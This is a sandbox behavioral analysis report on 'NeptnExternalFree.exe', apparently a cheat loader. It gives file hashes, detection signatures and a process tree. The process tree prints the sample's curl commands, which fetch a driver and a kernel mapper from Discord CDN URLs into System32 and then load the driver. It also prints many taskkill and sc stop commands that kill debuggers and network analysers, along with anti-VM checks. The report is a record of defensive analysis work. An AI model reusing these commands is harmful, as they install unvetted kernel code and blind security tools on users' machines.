Analysis
-
max time kernel
14s -
max time network
33s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
24-03-2023 20:34
Behavioral task
behavioral1
Sample
NeptnExternalFree.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
NeptnExternalFree.exe
Resource
win10v2004-20230220-en
General
-
Target
NeptnExternalFree.exe
-
Size
3.4MB
-
MD5
bbedbbb87552cceb179e196588684cbc
-
SHA1
d1b7d2834140f503d7a7b92df30fadece473c29c
-
SHA256
b30dfb8608adf0c39754145ed1e8e8cf391ef1a5cafeb207bdb53dbfe80a4a08
-
SHA512
1e65d28aad644fc791a01eb55d3dc53d6f5c63c5fb5c9e52c96c384b5109499364a0ca433e09383972419b02e53662f15f9d238c4313aeb6842a4057be9429f3
-
SSDEEP
98304:i1NGlQS2DA5FlCPfvJj2wmfXWjY9sz985D:i1N+QXAHlohyP/WsA98B
Malware Config
Signatures
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes:
NeptnExternalFree.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ NeptnExternalFree.exe -
Downloads MZ/PE file
-
Sets service image path in registry 2 TTPs 1 IoCs
Processes:
cmd.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\frAQBc8Wsa1xVPfv\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\frAQBc8Wsa1xVPfv" cmd.exe -
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
NeptnExternalFree.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion NeptnExternalFree.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion NeptnExternalFree.exe -
Executes dropped EXE 1 IoCs
Processes:
cmd.exepid process 4156 cmd.exe -
Processes:
resource yara_rule behavioral2/memory/2756-133-0x00007FF6EFCF0000-0x00007FF6F0609000-memory.dmp themida behavioral2/memory/2756-134-0x00007FF6EFCF0000-0x00007FF6F0609000-memory.dmp themida behavioral2/memory/2756-135-0x00007FF6EFCF0000-0x00007FF6F0609000-memory.dmp themida behavioral2/memory/2756-136-0x00007FF6EFCF0000-0x00007FF6F0609000-memory.dmp themida behavioral2/memory/2756-270-0x00007FF6EFCF0000-0x00007FF6F0609000-memory.dmp themida -
Processes:
NeptnExternalFree.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA NeptnExternalFree.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in System32 directory 2 IoCs
Processes:
curl.execurl.exedescription ioc process File created C:\Windows\System32\NeptnDriver.sys curl.exe File created C:\Windows\System32\mapper.exe curl.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
NeptnExternalFree.exepid process 2756 NeptnExternalFree.exe -
Launches sc.exe 22 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 412 sc.exe 1120 sc.exe 2016 sc.exe 392 sc.exe 3832 sc.exe 1952 sc.exe 3292 sc.exe 2468 sc.exe 1280 sc.exe 1968 sc.exe 1392 sc.exe 1428 sc.exe 4160 sc.exe 868 sc.exe 2728 sc.exe 3536 sc.exe 1656 sc.exe 2088 sc.exe 4768 sc.exe 3908 sc.exe 5044 sc.exe 2312 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Kills process with taskkill 64 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 2816 taskkill.exe 5104 taskkill.exe 4636 taskkill.exe 1904 taskkill.exe 2564 taskkill.exe 3624 taskkill.exe 896 taskkill.exe 4844 taskkill.exe 2272 taskkill.exe 4324 taskkill.exe 228 taskkill.exe 3628 taskkill.exe 4300 taskkill.exe 1484 taskkill.exe 4368 taskkill.exe 4740 taskkill.exe 2012 taskkill.exe 2480 taskkill.exe 3628 taskkill.exe 3396 taskkill.exe 3996 taskkill.exe 4480 taskkill.exe 4844 taskkill.exe 1008 taskkill.exe 3560 taskkill.exe 416 taskkill.exe 5080 taskkill.exe 1816 taskkill.exe 1708 taskkill.exe 1224 taskkill.exe 440 taskkill.exe 4736 taskkill.exe 1360 taskkill.exe 3520 taskkill.exe 2232 taskkill.exe 4044 taskkill.exe 4552 taskkill.exe 456 taskkill.exe 4560 taskkill.exe 1224 taskkill.exe 1224 taskkill.exe 1592 taskkill.exe 4520 taskkill.exe 1180 taskkill.exe 5080 taskkill.exe 4412 taskkill.exe 392 taskkill.exe 1840 taskkill.exe 1892 taskkill.exe 1596 taskkill.exe 412 taskkill.exe 1668 taskkill.exe 2804 taskkill.exe 1660 taskkill.exe 700 taskkill.exe 4852 taskkill.exe 4152 taskkill.exe 776 taskkill.exe 4148 taskkill.exe 3288 taskkill.exe 1916 taskkill.exe 3880 taskkill.exe 2012 taskkill.exe 648 taskkill.exe -
Modifies registry class 2 IoCs
Processes:
msedge.execmd.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1675742406-747946869-1029867430-1000\{6F4FCA6B-CBF7-4C18-9413-E6544FCF361C} cmd.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
msedge.exemsedge.execmd.exepid process 3396 msedge.exe 3396 msedge.exe 232 msedge.exe 232 msedge.exe 876 cmd.exe 876 cmd.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
cmd.exepid process 4156 cmd.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
Processes:
msedge.exepid process 232 msedge.exe 232 msedge.exe 232 msedge.exe -
Suspicious use of AdjustPrivilegeToken 27 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exesc.exetaskkill.exetaskkill.exetaskkill.exetaskkill.execmd.exetaskkill.exetaskkill.execmd.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exedescription pid process Token: SeDebugPrivilege 4300 taskkill.exe Token: SeDebugPrivilege 4936 taskkill.exe Token: SeDebugPrivilege 1224 taskkill.exe Token: SeDebugPrivilege 1816 taskkill.exe Token: SeDebugPrivilege 4412 taskkill.exe Token: SeDebugPrivilege 1660 taskkill.exe Token: SeDebugPrivilege 896 taskkill.exe Token: SeDebugPrivilege 4936 taskkill.exe Token: SeDebugPrivilege 2232 taskkill.exe Token: SeDebugPrivilege 392 sc.exe Token: SeDebugPrivilege 2480 taskkill.exe Token: SeDebugPrivilege 1840 taskkill.exe Token: SeDebugPrivilege 2488 taskkill.exe Token: SeDebugPrivilege 4900 taskkill.exe Token: SeLoadDriverPrivilege 4156 cmd.exe Token: SeDebugPrivilege 1708 taskkill.exe Token: SeDebugPrivilege 4560 taskkill.exe Token: SeDebugPrivilege 4044 cmd.exe Token: SeDebugPrivilege 1892 taskkill.exe Token: SeDebugPrivilege 2816 taskkill.exe Token: SeDebugPrivilege 4844 taskkill.exe Token: SeDebugPrivilege 4168 taskkill.exe Token: SeDebugPrivilege 1788 taskkill.exe Token: SeDebugPrivilege 4488 taskkill.exe Token: SeDebugPrivilege 5104 taskkill.exe Token: SeDebugPrivilege 4636 taskkill.exe Token: SeDebugPrivilege 1596 taskkill.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
Processes:
msedge.exepid process 232 msedge.exe 232 msedge.exe 232 msedge.exe 232 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
NeptnExternalFree.execmd.exemsedge.execmd.execmd.exedescription pid process target process PID 2756 wrote to memory of 1488 2756 NeptnExternalFree.exe cmd.exe PID 2756 wrote to memory of 1488 2756 NeptnExternalFree.exe cmd.exe PID 1488 wrote to memory of 232 1488 cmd.exe msedge.exe PID 1488 wrote to memory of 232 1488 cmd.exe msedge.exe PID 232 wrote to memory of 3856 232 msedge.exe msedge.exe PID 232 wrote to memory of 3856 232 msedge.exe msedge.exe PID 2756 wrote to memory of 2820 2756 NeptnExternalFree.exe cmd.exe PID 2756 wrote to memory of 2820 2756 NeptnExternalFree.exe cmd.exe PID 232 wrote to memory of 3560 232 msedge.exe msedge.exe PID 232 wrote to memory of 3560 232 msedge.exe msedge.exe PID 232 wrote to memory of 3560 232 msedge.exe msedge.exe PID 232 wrote to memory of 3560 232 msedge.exe msedge.exe PID 232 wrote to memory of 3560 232 msedge.exe msedge.exe PID 232 wrote to memory of 3560 232 msedge.exe msedge.exe PID 232 wrote to memory of 3560 232 msedge.exe msedge.exe PID 232 wrote to memory of 3560 232 msedge.exe msedge.exe PID 232 wrote to memory of 3560 232 msedge.exe msedge.exe PID 232 wrote to memory of 3560 232 msedge.exe msedge.exe PID 232 wrote to memory of 3560 232 msedge.exe msedge.exe PID 232 wrote to memory of 3560 232 msedge.exe msedge.exe PID 232 wrote to memory of 3560 232 msedge.exe msedge.exe PID 232 wrote to memory of 3560 232 msedge.exe msedge.exe PID 232 wrote to memory of 3560 232 msedge.exe msedge.exe PID 232 wrote to memory of 3560 232 msedge.exe msedge.exe PID 232 wrote to memory of 3560 232 msedge.exe msedge.exe PID 232 wrote to memory of 3560 232 msedge.exe msedge.exe PID 232 wrote to memory of 3560 232 msedge.exe msedge.exe PID 232 wrote to memory of 3560 232 msedge.exe msedge.exe PID 232 wrote to memory of 3560 232 msedge.exe msedge.exe PID 232 wrote to memory of 3560 232 msedge.exe msedge.exe PID 232 wrote to memory of 3560 232 msedge.exe msedge.exe PID 232 wrote to memory of 3560 232 msedge.exe msedge.exe PID 232 wrote to memory of 3560 232 msedge.exe msedge.exe PID 232 wrote to memory of 3560 232 msedge.exe msedge.exe PID 232 wrote to memory of 3560 232 msedge.exe msedge.exe PID 232 wrote to memory of 3560 232 msedge.exe msedge.exe PID 232 wrote to memory of 3560 232 msedge.exe msedge.exe PID 232 wrote to memory of 3560 232 msedge.exe msedge.exe PID 232 wrote to memory of 3560 232 msedge.exe msedge.exe PID 232 wrote to memory of 3560 232 msedge.exe msedge.exe PID 232 wrote to memory of 3560 232 msedge.exe msedge.exe PID 232 wrote to memory of 3560 232 msedge.exe msedge.exe PID 232 wrote to memory of 3560 232 msedge.exe msedge.exe PID 232 wrote to memory of 3560 232 msedge.exe msedge.exe PID 232 wrote to memory of 3560 232 msedge.exe msedge.exe PID 232 wrote to memory of 3560 232 msedge.exe msedge.exe PID 232 wrote to memory of 3560 232 msedge.exe msedge.exe PID 232 wrote to memory of 3560 232 msedge.exe msedge.exe PID 2756 wrote to memory of 3516 2756 NeptnExternalFree.exe cmd.exe PID 2756 wrote to memory of 3516 2756 NeptnExternalFree.exe cmd.exe PID 232 wrote to memory of 3396 232 msedge.exe msedge.exe PID 232 wrote to memory of 3396 232 msedge.exe msedge.exe PID 3516 wrote to memory of 4300 3516 cmd.exe taskkill.exe PID 3516 wrote to memory of 4300 3516 cmd.exe taskkill.exe PID 2820 wrote to memory of 4904 2820 cmd.exe curl.exe PID 2820 wrote to memory of 4904 2820 cmd.exe curl.exe PID 232 wrote to memory of 1300 232 msedge.exe msedge.exe PID 232 wrote to memory of 1300 232 msedge.exe msedge.exe PID 232 wrote to memory of 1300 232 msedge.exe msedge.exe PID 232 wrote to memory of 1300 232 msedge.exe msedge.exe PID 232 wrote to memory of 1300 232 msedge.exe msedge.exe PID 232 wrote to memory of 1300 232 msedge.exe msedge.exe PID 232 wrote to memory of 1300 232 msedge.exe msedge.exe PID 232 wrote to memory of 1300 232 msedge.exe msedge.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\NeptnExternalFree.exe"C:\Users\Admin\AppData\Local\Temp\NeptnExternalFree.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start https://discord.gg/xCRS6yyPF62⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discord.gg/xCRS6yyPF63⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fff956146f8,0x7fff95614708,0x7fff956147184⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,981929177601675851,13700018620429393933,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:24⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2092,981929177601675851,13700018620429393933,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2372 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2092,981929177601675851,13700018620429393933,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2364 /prefetch:84⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,981929177601675851,13700018620429393933,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3644 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,981929177601675851,13700018620429393933,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3624 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,981929177601675851,13700018620429393933,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5200 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2092,981929177601675851,13700018620429393933,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=3772 /prefetch:84⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2092,981929177601675851,13700018620429393933,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3220 /prefetch:84⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/879146399290241105/1070367957353500782/NeptnDriver.sys --output C:\Windows\System32\NeptnDriver.sys >nul 2>&12⤵
-
C:\Windows\system32\curl.execurl https://cdn.discordapp.com/attachments/879146399290241105/1070367957353500782/NeptnDriver.sys --output C:\Windows\System32\NeptnDriver.sys3⤵
- Drops file in System32 directory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerUI.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerSvc.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Ida64.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/879146399290241105/1057075244617187368/mapper.exe --output C:\Windows\System32\mapper.exe >nul 2>&12⤵
-
C:\Windows\system32\curl.execurl https://cdn.discordapp.com/attachments/879146399290241105/1057075244617187368/mapper.exe --output C:\Windows\System32\mapper.exe3⤵
- Drops file in System32 directory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im OllyDbg.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Dbg64.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Dbg64.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Dbg32.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop HTTPDebuggerPro3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerUI.exe3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerSvc.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop HTTPDebuggerPro3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\mapper.exe C:\Windows\System32\NeptnDriver.sys2⤵
-
C:\Windows\System32\mapper.exeC:\Windows\System32\mapper.exe C:\Windows\System32\NeptnDriver.sys3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq charles*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq charles*" /IM * /F /T3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ida*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq ida*" /IM * /F /T3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&12⤵
- Sets service image path in registry
- Executes dropped EXE
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop HTTPDebuggerPro3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerProSdk >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop HTTPDebuggerProSdk3⤵
- Launches sc.exe
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop KProcessHacker3 >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop KProcessHacker33⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop KProcessHacker2 >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop KProcessHacker23⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop KProcessHacker1 >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop KProcessHacker13⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop wireshark >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop wireshark3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerUI.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerSvc.exe3⤵
